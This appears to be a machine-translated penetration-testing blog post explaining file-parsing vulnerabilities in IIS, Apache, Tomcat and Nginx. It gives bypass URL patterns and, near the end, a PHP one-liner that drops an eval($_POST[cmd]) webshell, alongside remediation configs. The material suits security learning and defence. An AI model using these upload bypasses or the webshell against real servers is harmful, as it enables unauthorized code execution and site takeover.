Blogger's nickname ： Stair hopping Penguin
Blogger homepage link ： Blogger homepage portal

Blogger column page connection ： Column portal -- Network security technology
The original intention of creation ： The original intention of this blog is to communicate with technical friends , Everyone's technology has shortcomings , Bloggers are the same , Ask for advice modestly , I hope all technical friends can give me guidance .
Blogger's motto ： Find light , Follow the light , Become light , Diffuse luminescence ;
Bloggers' research interests ： Penetration test 、 machine learning ;
Blogger's message ： Thank you for your support , Your support is my driving force ;

Catalog

One 、 Analyze what the vulnerability is

Two 、 Web page commonly used middleware

3、 ... and 、 Middleware parsing vulnerability

1.IIS

2.APACHE

3.TOMCAT

4.NGINX

Four 、 Summary

One 、 Analyze what the vulnerability is

Parsing vulnerability mainly refers to some special files being IIS、Apache、Nginx In some cases, the middleware is interpreted as a vulnerability in the format of script file .

Generally speaking, it's , There are specific restrictions on file parsing , But there are loopholes , A process that bypasses restrictions on uploading arbitrary files .

Two 、 Web page commonly used middleware

1.IIS

IIS The full name is Internet Information Services（ Internet Information Service ）, It is provided by Microsoft and runs in Windows Middleware under the system , It is mainly used to analyze .ASP,.ASA,.CER Three file formats . In the actual upload environment, generally ASP Such documents are blacklisted , So sometimes you can try ASA and CER Upload in these two formats , Sometimes there will be unexpected results .

2.APACHE

Apache It's the world's number one user Web Server software , It can run on almost all computer platforms , Because of its cross platform and security is widely used , It's the most popular Web One of the server-side software .

3.TOMCAT

TomcatTomcat It's an implementation JAVA EE The smallest of standards WEB The server , yes Apache Software foundation Jakarta A core project in a project , from Apache、Sun Developed with other companies and individuals . because Tomcat Advanced technology 、 Stable performance , And open source is free , So deeply Java Fans love it and get the approval of some software developers , Become the more popular Web application server .

4.NGINX

Nginx Is an open source and high performance 、 reliable HTTP middleware 、 Agency service . It is characterized by less memory , Strong concurrency .

3、 ... and 、 Middleware parsing vulnerability

1.IIS Parsing vulnerabilities

（1）IIS5.x - 6.x Parsing vulnerabilities

     Use iis5.x-6.x Version of the server , Mostly windows server 2003, The website is older , Development statements are generally asp; This parsing vulnerability can only be parsed asp file , And can't parse aspx file .
     Directory resolution (6.0)
     form ：www.xxx.com/xx.asp/xx.jpg
principle : The server defaults to .asp,.asa The files in the directory are parsed into asp file .

File parsing
form ：www.xxx.com/xx.asp;.jpg
principle ： The server does not parse by default ; After the number , therefore xx.asp;.jpg It's interpreted as asp The file .
Parsing file types
IIS6.0 The default executable is in addition to asp There are also three kinds of :
    /test.asa
    /test.cer
    /test.cdx

（2）IIS 7.0/IIS 7.5/ Nginx <8.03 Malformed parsing holes

IIS 7.0/IIS 7.5/ Nginx <8.03 stay Fast-CGI In operation mode , In a file path (/xx.jpg) Followed by /xx.php Will /xx.jpg/xx.php It can be interpreted as php file .
In some websites with loopholes , visit http://127.0.0.1/1.jpg/1.php, At this time 1.jpg Will be treated as PHP Script to parse , here 1.php It doesn't exist .
This means that attackers can upload legitimate “ picture ”（ Picture Trojan horse ） And then in URL Followed by “/xxx.php”, You can get the website WebShell, Just use the kitchen knife link .
1.jpg/1.php

（3）IIS7.5 Parsing vulnerabilities

IIS7.5 The loopholes and nginx Similar , It's all because of php In profile , Open the cgi.fix_pathinfo, And this is not nginx perhaps iis7.5 Its own loopholes .

（4） Repair plan

Repair plan
1. There is no official Microsoft patch yet , You can write your own regular , Stop uploading xx.asp;.jpg File name of type .
2. Do a good job in setting permissions , Restrict users from creating folders .

2.APACHE Parsing vulnerabilities

（1）APACHE Profile vulnerability

Apache The rule of parsing files is to judge parsing from right to left , If the suffix is unrecognized file resolution , Just to the left . such as test.php.owf.rar “.owf” and ”.rar” These two suffixes are apache Unrecognized parsing ,apache It will oldboy.php.owf.rar It can be interpreted as php.
    
     Form of loopholes
        www.xxxx.xxx.com/test.php.php123

① If in Apache Of conf There is such a line configuration in AddHandler php5-script .php In this case, as long as the file name contains .php Even if the filename is test2.php.jpg Will also php To execute .
② If in Apache Of conf There is such a line configuration in AddType application/x-httpd-php .jpg Even if the extension is jpg, As well as php How to execute .

（2） Repair plan

①apache The configuration file , prohibit .php. Such documents are executed , Add... To the configuration file
 

        <Files ~ “.(php.|php3.)”>
                Order Allow,Deny
                Deny from all
        </Files>

② Pseudo static can solve this problem , Rewrite similar .php.* Such documents , open apache Of httpd.conf find LoadModule rewrite_module modules/mod_rewrite.so
hold # Remove the number , restart apache, Create... In the root directory of the website .htaccess file , The code is as follows :
 

    <IfModule mod_rewrite.c>
	RewriteEngine On
	RewriteRule .(php.|php3.) /index.php
	RewriteRule .(pHp.|pHp3.) /index.php
	RewriteRule .(phP.|phP3.) /index.php
	RewriteRule .(Php.|Php3.) /index.php
	RewriteRule .(PHp.|PHp3.) /index.php
	RewriteRule .(PhP.|PhP3.) /index.php
	RewriteRule .(pHP.|pHP3.) /index.php
	RewriteRule .(PHP.|PHP3.) /index.php
	</IfModule>

3.TOMCAT Parsing vulnerabilities

（1）CVE-2020-1938 The file contains a vulnerability

describe

  The vulnerability is due to Tomcat AJP A defect in the agreement results in , An attacker can exploit this vulnerability by constructing specific parameters , Read server webapp Any file under , Such as :webapp Configuration files or source code, etc . If the target server has file upload function at the same time , Attackers can further implement remote code execution .

Vulnerability impact version

Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0.31

Vulnerability analysis

  Tomcat Processing ajp There is a vulnerability in the protocol , By calling request.setAttribute by Tomcat Set up any request attribute . It's found that Tomcat ajp The agreement exists web Directory arbitrary file read vulnerability and JSP The file contains a vulnerability .
  When ajp URI Set to not jsp When the path ,Tomcat Would call DefaultServlet Handle , This will lead to web Directory arbitrary file read vulnerability .

  When ajp URI Set to jsp When the path ,Tomcat Would call JspServlet Handle , This will lead to JSP The file contains a vulnerability

4.NGINX Parsing vulnerabilities

Loophole principle
Nginx The default is CGI The way to support PHP Analytic , The common practice is to Nginx Through regular matching settings in the configuration file SCRIPT_FILENAME. When accessing www.xx.com/phpinfo.jpg/1.php This URL when ,$fastcgi_script_name Will be set to “phpinfo.jpg/1.php”, And then it's constructed as SCRIPT_FILENAME Pass to PHP CGI, however PHP Why do you accept such parameters , And will phpinfo.jpg As PHP File parsing ? This is to say fix_pathinfo This option . If this option is turned on , Then it will trigger in PHP The following logic in ：

PHP Will think SCRIPT_FILENAME yes phpinfo.jpg, and 1.php yes PATH_INFO, So it will phpinfo.jpg As PHP File to parse
Form of loopholes

    www.xxxx.com/UploadFiles/image/1.jpg/1.php
    www.xxxx.com/UploadFiles/image/1.jpg%00.php
    www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php

xxx.jpg%00.php (Nginx <8.03 Empty Byte Code Execution Vulnerability )
Another way ： Upload a name for test.jpg, The following documents .

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

And then visit test.jpg/.php, In this directory will generate a word Trojan shell.php.

Four 、 Summary

Basically, there are large and small vulnerabilities in middleware every year , But generally, the official will even patch for maintenance , So the harm is not very serious .